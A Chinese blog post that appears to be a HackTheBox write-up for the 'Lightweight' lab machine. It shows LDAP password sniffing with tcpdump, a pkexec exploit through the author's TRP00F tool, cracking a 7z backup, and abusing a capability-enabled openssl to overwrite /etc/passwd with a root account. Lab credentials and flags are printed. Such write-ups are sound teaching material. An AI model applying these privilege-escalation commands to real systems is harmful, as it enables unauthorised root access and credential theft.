[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自动化权限提升+openssl 权限提升

于 2024-09-04 17:11:38 发布
阅读量311 收藏 9
点赞数 13
分类专栏: HackTheBox 文章标签: 自动化 运维
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141898711
版权

信息收集

IP AddressOpening Ports
10.10.10.119TCP:22,80,389

$ nmap -p- 10.10.10.119 --min-rate 1000 -sC -sV

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

HTTP

http://10.10.10.119/

image.png

http://10.10.10.119/info.php

image-1.png

  1. 目标环境:前端服务器进行了配置更新,现需要在软件开发生命周期(SDLC)中进行渗透测试。服务器上的实际页面已被虚构内容替换,但所有需要测试的功能都已经集成。

  2. 安全保护:服务器有一些安全措施,比如防止暴力破解。如果尝试暴力破解暴露的服务,可能会被封禁,封禁时间最长可达5分钟。

  3. 行为要求:如果被封禁,是测试者自己的责任。被封禁后,不能重置服务器,以免影响其他测试人员的工作,而是要尝试不同的方法。

  4. 封禁信息:被封禁的IP地址列表可以在特定页面查看,不过在封禁期间可能无法访问该页面。

  5. 登录页面:如果想访问测试环境,需要前往用户页面。

http://10.10.10.119/user.php

image-2.png

  1. 阅读信息页面:如果用户还没有阅读相关信息页面,建议先去阅读该页面并仔细查看内容。

  2. SSH登录:服务器允许通过SSH登录。当用户第一次访问HTTP页面时,服务器会自动将用户的IP地址(例如 10.10.16.24)作为用户名和密码进行注册。这个过程在一分钟内完成。

  3. 修改密码:建议用户在成功登录服务器后立即更改密码以确保账户安全。

  4. 重置账户:如果用户出于某种原因需要重置账户,可以点击提供的链接。重置过程可能需要一分钟时间,账户会被删除并重新创建,注意,这个操作会删除用户主目录中的所有文件。

image-3.png

LDAP密码嗅探

[10.10.16.24@lightweight /]$ cat /etc/passwd

image-4.png

嗅探LDAP服务端口

[10.10.16.24@lightweight /]$ tcpdump -i lo port 389 -w /tmp/capture.cap -v

image-5.png

maptnh@maptnh:~/Desktop/htb$ scp 10.10.16.24@10.10.10.119:/tmp/capture.cap /tmp/capture.cap

image-6.png

ldapuser2的密码以明文形式被捕获

password:8bc8251332abe1d7f105d3e53ad39ac2

[10.10.16.24@lightweight /]$ su ldapuser2

image-7.png

User.txt

616c83ec01d41ae4e9f50b3a4293907b

TRP00F 自动化权限提升

https://github.com/MartinxMax/trp00f

当用户权限提升至ldapuser2即可权限提升

maptnh@maptnh:~/Desktop/htb/Github/TRP00f$ python3 trp00f.py --lhost 10.10.16.24 --lport 10000 --rhost 10.10.16.24 --rport 10001 --http 1111

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

image-8.png

权限提升

ldapuser2 –> ldapuser1

image-9.png

[ldapuser2@lightweight ~]$ cp backup.7z /tmp

maptnh@maptnh:~/Desktop/htb$ scp 10.10.16.24@10.10.10.119:/tmp/backup.7z /tmp/backup.7z

image-10.png

需要密码解压

maptnh@maptnh:/tmp$ 7z2john backup.7z >backup.7z.hash

maptnh@maptnh:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.7z.hash

image-11.png

password:delete

maptnh@maptnh:/tmp$ cat status.php

maptnh@maptnh:/tmp$ 7z x backup.7z

image-12.png

username:ldapuser1 password:f3ca9d298a553da117442deeb6fa932d

openssl 权限提升

[ldapuser1@lightweight ~]$ ls -la

[ldapuser1@lightweight ~]$ which openssl tcpdump

[ldapuser1@lightweight ~]$ md5sum /usr/sbin/tcpdump ./tcpdump /usr/bin/openssl ./openssl

说明是同一个文件

image-13.png

[ldapuser1@lightweight ~]$ getcap /usr/sbin/tcpdump

[ldapuser1@lightweight ~]$ getcap ./openssl

image-14.png

在Linux系统中,ep 权限标记代表 Effective(有效)和 Permitted(允许)。这两个标志是Linux安全功能(Linux Capabilities)的一部分,它们允许你对二进制文件设置特定的权限,而不必以root用户身份运行该文件。

maptnh@maptnh:/tmp$ openssl passwd -1 -salt maptnh root

image-16.png

[ldapuser1@lightweight ~]$ ./openssl base64 -in /etc/passwd | base64 -d > /dev/shm/passwd

[ldapuser1@lightweight ~]$ echo 'maptnh:$1$maptnh$EaRHF5oKs2oIYcUsHbWYh0:0:0:/bin:/bin/bash'>/dev/shm/passwd

[ldapuser1@lightweight ~]$ cat /dev/shm/passwd | base64 | ./openssl enc -d -base64 -out /etc/passwd

[ldapuser1@lightweight ~]$ su maptnh

image-17.png

Root.txt

e31f846f4db812157e6595aa0e0e9c80

Мартин.
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(8)Lightweight OpenPose轻量化模型之 模型封装 + 摔倒检测
yohnyang的博客
08-23 2374
openpose封装用于姿态检测:摔倒、站立
大数据安全之kerberos+ldap身份验证(理论篇)
王某的博客
04-15 7801
大数据安全 1、限制只有合法用户身份的用户访问大数据平台集群 (1) 用户身份认证:外部用户或者第三方服务对集群的访问过程中的身份鉴别;用户在访问启用了安全认证的集群时,必须能通过安全认证。 (2)网络隔离:大数据平台集群支持通过网络平面隔离的方式保证网络安全(比如配置防火墙)。 2、定义什么样的用户和应用可以访问数据 权限控制:包括鉴权、授信管理,即确保用户对平台、接口、操作、资源、数...
LDAPLDAP 和 AD 介绍及使用 LDAP 操作 AD 域
书山有路,学海无涯。记录成长,追逐梦想
05-02 3260
LDAP 也可以说成是一种数据库,也有 Client 端和 Server 端。Server 端是用来存放数据,Client 端用于操作增删改查等操作,通常说的 LDAP 是指运行这个数据库的服务器。只不过,LDAP 数据库结构为树结构,数据存储在叶子节点上。
Linux_LDAP+NFS+autofs
烟云的计算
12-03 3280
目录目录 前言 Ldap LDAPNFSautofs ServerPost前言LDAP+NFS+Autofs也是一种网络用户集中管理解决方案,相对于NIS+NFS+Autofs而言,有着更可靠的安全性。LdapLDAP(Lightweight Directory Access Protocol)轻量目录访问协议,它基于X.500标准的,与X.500不同,LDAP支持TCP/IP,这对访问Intern
CCF-CSP真题《202303-3 LDAP》思路+python,c++满分题解
weixin_53919192的博客
07-05 5998
本文为大家用c++满分题解CCF-CSP真题《202303-3 LDAP》,希望对你有帮助
LDAP及CDH中服务的权限认证
Yore - Home
04-19 4900
主要对 LDAP 进行了介绍,重点选择 OpenLDAP进行了说明,重点是对 OpenLDAP的安装与配置进行了详细的说明。最后再将 LDAP 与 CDH 环境集成(主要以 Hive、Impala、Hue为例)。开启了LDAP 后对服务访问就需要加上用户认证,之后重点介绍了Hive、Impala的 JDBC、Beeline、脚本形式的使用,重点关注 Impala-shell 如何脚本化执行 sql 文件,最后重点注意在 Spring Boot 中访问 Impala时的几个注意点。
LDAP对接Gitlab+Wiki+Jumpserver+Open***配置
weixin_34144450的博客
04-14 2635
LDAP对接Gitlab+Wiki+Jumpserver+Open***配置 LDAP 全称轻量级目录访问协议(英文:Lightweight Directory Access Protocol),是一个运行在 TCP/IP 上的目录访问协议。目录是一个特殊的数据库,它的数据经常被查询,但是不经常更新。其专门针对读取、浏览和搜索操作进行了特定的优化。目录一般用来包含描述性的,基于属性的信息并支持精细...
基于Spring Boot的LDAP开发全教程
流子的专栏
10-18 3633
LDAP(轻量级目录访问协议,Lightweight Directory Access Protocol)是一种用于访问和维护分布式目录服务的开放标准协议,是一种基于TCP/IP协议的客户端-服务器协议,用于访问和管理分布式目录服务,如企业内部的用户目录、组织结构和资源信息等。LDAP具有轻量级、高效性和可扩展性等特点,被广泛应用于AD域操作,身份验证、用户管理、电子邮件系统和网络存储等领域。
LDAP简介及Java、客户端连接
lydms的博客
06-13 1万+
1、简介 2、Java代码连接 3、客户端连接
机器学习实战 | AutoML自动化机器学习建模
热门推荐
ShowMeAI研究中心
03-22 1万+
本篇介绍工具库FLAML。FLAML 由 Microsoft Research 开发,适用于AutoML自动化机器学习建模,构建端到端机器学习流程、解决实际场景问题。
ldap服务端+客户端 配套软件
11-17
LDAPLightweight Directory Access Protocol)是一种轻量级目录访问协议,用于存储和检索分布式目录信息。在IT领域,LDAP常用于组织和管理用户账户、权限、配置数据等,广泛应用于企业环境的身份验证、授权和目录...
ldap服务器用户及权限管理控制linux操作系统-电脑资料.doc
12-21
LDAPLightweight Directory Access Protocol)是一种轻量级目录访问协议,广泛应用于身份验证、权限管理和目录服务等领域。下面将详细介绍 LDAP 服务器用户及权限管理控制在 Linux 操作系统中的实现。 一、新建...
Lightweight Neural Network++-开源
04-28
Lightweight Neural Network++(以下简称LWNN++)正是这样一款专为C++编程语言设计的轻量级神经网络库,它旨在提供高效、灵活且易于使用的前馈神经网络解决方案。 LWNN++的主要特性在于其轻量化设计。在资源有限...
LEA密码算法的积分区分器自动化搜索新方法.pdf
09-16
LEA(Lightweight Encryption Algorithm)密码算法是一种针对轻量级环境设计的分组加密算法。其设计目标是在硬件和软件平台上均能提供高性能的加密解决方案,特别是在物联网(IoT)等资源受限的应用场景中。本文...
论文研究-基于RBAC和LDAP权限管理系统研究 .pdf
08-16
在如今的信息化时代,计算机网络技术的迅猛发展带来了海量数据资源的存储与管理需求,同时也对网络安全提出了更高的要求。特别是对于大型业务管理系统来说,如何高效、安全地管理用户对数据资源的访问权限成为了一个...
python自动化脚本:让工作自动化起来
Python_00001的博客
08-27 3973
Python是一种流行的编程语言,我们将探讨9个Python脚本及其代码,。无论您是开发人员、数据分析师还是只是想简化工作流程的人,这些脚本都能满足您的需求。
性能优化:自动化处理系统设计
最新发布
码途探索
09-03 887
在当今这个信息爆炸、技术日新月异的时代,企业面临着前所未有的挑战和机遇。随着业务量的不断增长,传统的手动处理方式已经难以满足日益增长的业务需求。效率低下、错误频出、资源浪费等问题日益凸显,严重制约了企业的快速发展。因此,如何通过技术创新来优化业务流程、提高工作效率,已经成为企业亟待解决的问题。本文将围绕“性能优化:自动化处理系统设计”这一主题,深入探讨如何通过自动化技术来解决手动处理中的各种问题,提高系统性能。
自动化数据汇总:使用Python从多个数据源汇总数据
这家伙很懒,什么都没有留下
08-29 1569
CSV文件:逗号分隔值(Comma-Separated Values,CSV)是一种常用的文本格式,用于存储表格数据,如电子表格或数据库。Excel文件:Microsoft Excel是一种广泛使用的电子表格软件,其文件格式(如.xls和.xlsx)支持复杂的表格数据和公式。数据库:数据库是存储、管理和检索数据的系统,常用的有SQLite、MySQL、PostgreSQL等。pandas:提供高性能、易用的数据结构和数据分析工具,是Python数据分析的核心库。
Jenkins配置使用LDAP的用户和密码登录
qq_42750608的博客
09-01 1042
Jenkins配置使用LDAP的用户和密码登录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值